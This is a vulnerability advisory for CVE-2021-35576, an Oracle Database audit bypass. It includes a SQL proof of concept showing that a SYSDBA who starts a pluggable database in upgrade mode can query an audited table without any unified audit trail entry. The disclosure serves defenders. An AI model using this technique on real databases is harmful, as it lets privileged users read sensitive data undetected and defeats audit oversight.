Oracle Unified Audit Policy Bypass

`Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 12.1.0.2, 12.2.0.1, 19c  
Tested Version(s): 19c  
Risk Level: low  
Solution Status: Fixed  
Manufacturer Notification: 2021-03-17  
Solution Date: 2021-10-17  
Public Disclosure: 2022-06-11  
CVE Reference: CVE-2021-35576  
Author of Advisory: Emad Al-Mousa  
  
Overview:  
Oracle Database is a general purpose relational database management system (RDMBS).  
Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.  
  
  
*****************************************  
Vulnerability Details:  
The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.  
  
*****************************************  
Proof of Concept (PoC):  
I will create a table in pluggable database PDB1 under HR schema and insert few records:  
SQL> CREATE TABLE HR.EMPLOYEE  
(  
FIRST_NAME VARCHAR2(50),  
LAST_NAME VARCHAR2(50)  
);  
SQL> INSERT INTO HR.EMPLOYEE (  
FIRST_NAME, LAST_NAME)  
VALUES ( 'EMAD','MOUSA' );  
SQL> commit;  
  
  
SQL> INSERT INTO HR.EMPLOYEE (  
FIRST_NAME, LAST_NAME)  
VALUES ( 'SAMI','MOUSA' );  
SQL> commit;  
I will now create audit policy:  
SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;  
SQL> audit policy SELECT_P1;  
To check audit policies configured in PDB1 database:  
SQL> SELECT * FROM audit_unified_enabled_policies;  
  
Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:  
sqlplus / as sysdba  
SQL> alter session set container=PDB1;  
SQL> shutdown immediate;  
SQL> startup upgrade;  
SQL> select * from HR.EMPLOYEE;  
SQL> startup force;  
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;  
  
  
Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:  
  
SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;  
So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !  
*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html   
https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/  
https://nvd.nist.gov/vuln/detail/CVE-2021-35576  
  
Credit:  
Emad Al-Mousa: CVE-2021-35576  
`